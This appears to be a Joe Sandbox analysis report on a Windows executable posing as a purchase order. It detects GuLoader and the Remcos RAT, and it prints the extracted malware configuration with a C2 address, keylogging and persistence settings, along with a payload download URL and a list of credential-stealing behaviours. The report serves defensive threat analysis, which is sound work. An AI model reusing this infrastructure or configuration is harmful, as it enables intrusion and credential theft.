Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe

Overview

General Information

Sample name:Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
Analysis ID:1576145
MD5:20d75709d275ee9fc5b559e50ae667c3
SHA1:27b41abb5cf6a0492fbd44db949ed78629548ee6
SHA256:530d877fd245da9636806e92b1b3271ccbdb89c4e08e534171469b70f2f7dc7a
Tags:exeuser-julianmckein
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["162.251.122.87:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UOMZ21", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000005.00000002.2832600827.00000000076B7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000005.00000002.2852514486.000000003788F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000000.00000002.2363055993.00000000073C6000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe PID: 7000JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
            Process Memory Space: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe PID: 6752JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security

              Stealing of Sensitive Information

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, ProcessId: 6752, TargetFilename: C:\ProgramData\remcos\logs.dat
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-16T15:28:08.151051+010020365941Malware Command and Control Activity Detected192.168.2.849792162.251.122.872404TCP
              2024-12-16T15:28:10.366696+010020365941Malware Command and Control Activity Detected192.168.2.849798162.251.122.872404TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-16T15:28:10.656732+010028033043Unknown Traffic192.168.2.849799178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-16T15:28:01.725417+010028032702Potentially Bad Traffic192.168.2.84977666.63.187.3080TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000005.00000002.2832600827.00000000076B7000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["162.251.122.87:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UOMZ21", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Source: Yara matchFile source: 00000005.00000002.2832600827.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2852514486.000000003788F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,8_2_00404423
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 0_2_00405814 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405814
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 0_2_004062CF FindFirstFileW,FindClose,0_2_004062CF
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_00402770 FindFirstFileW,5_2_00402770
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_00405814 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405814
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_004062CF FindFirstFileW,FindClose,5_2_004062CF
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_382A10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_382A10F1
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_382A6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,5_2_382A6580
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_0040AE51 FindFirstFileW,FindNextFileW,8_2_0040AE51
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,9_2_00407EF8
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,10_2_00407898

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49798 -> 162.251.122.87:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49792 -> 162.251.122.87:2404
              Source: Malware configuration extractorIPs: 162.251.122.87
              Source: global trafficTCP traffic: 192.168.2.8:49792 -> 162.251.122.87:2404
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49776 -> 66.63.187.30:80
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49799 -> 178.237.33.50:80
              Source: global trafficHTTP traffic detected: GET /hpVMAPRZVuaX36.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 66.63.187.30Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.30
              Source: global trafficHTTP traffic detected: GET /hpVMAPRZVuaX36.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 66.63.187.30Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000002.2852972867.0000000038270000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000002.2852788457.0000000038180000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000002.2852788457.0000000038180000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000002.2832552254.00000000075F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.30/hpVMAPRZVuaX36.bin
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000003.2669888345.00000000076FC000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000003.2629821070.00000000076FA000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000002.2832745888.00000000076FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000000.00000000.1569620221.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeString found in binary or memory: http://www.ebuddy.com
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeString found in binary or memory: http://www.imvu.com
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000002.2852972867.0000000038270000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000002.2852972867.0000000038270000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeString found in binary or memory: http://www.nirsoft.net/
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmp, Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000000.2357104183.000000000044A000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.skinstudio.netG
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeString found in binary or memory: https://www.google.com
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 0_2_00405373 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405373
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,8_2_0040987A
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,8_2_004098E2
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,9_2_00406DFC
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,9_2_00406E9F
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,10_2_004068B5
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,10_2_004072B5

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000005.00000002.2832600827.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2852514486.000000003788F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              System Summary

              barindex
              Source: initial sampleStatic PE information: Filename: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,8_2_0040DD85
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_00401806 NtdllDefWindowProc_W,8_2_00401806
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_004018C0 NtdllDefWindowProc_W,8_2_004018C0
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_004016FD NtdllDefWindowProc_A,9_2_004016FD
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_004017B7 NtdllDefWindowProc_A,9_2_004017B7
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_00402CAC NtdllDefWindowProc_A,10_2_00402CAC
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_00402D66 NtdllDefWindowProc_A,10_2_00402D66
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 0_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040335A
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,5_2_0040335A
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 0_2_004065E10_2_004065E1
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 0_2_00404BB00_2_00404BB0
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_004065E15_2_004065E1
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_00404BB05_2_00404BB0
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_382B71945_2_382B7194
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_382AB5C15_2_382AB5C1
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_0044B0408_2_0044B040
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_0043610D8_2_0043610D
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_004473108_2_00447310
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_0044A4908_2_0044A490
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_0040755A8_2_0040755A
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_0043C5608_2_0043C560
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_0044B6108_2_0044B610
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_0044D6C08_2_0044D6C0
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_004476F08_2_004476F0
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_0044B8708_2_0044B870
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_0044081D8_2_0044081D
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_004149578_2_00414957
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_004079EE8_2_004079EE
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_00407AEB8_2_00407AEB
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_0044AA808_2_0044AA80
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_00412AA98_2_00412AA9
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_00404B748_2_00404B74
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_00404B038_2_00404B03
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_0044BBD88_2_0044BBD8
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_00404BE58_2_00404BE5
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_00404C768_2_00404C76
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_00415CFE8_2_00415CFE
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_00416D728_2_00416D72
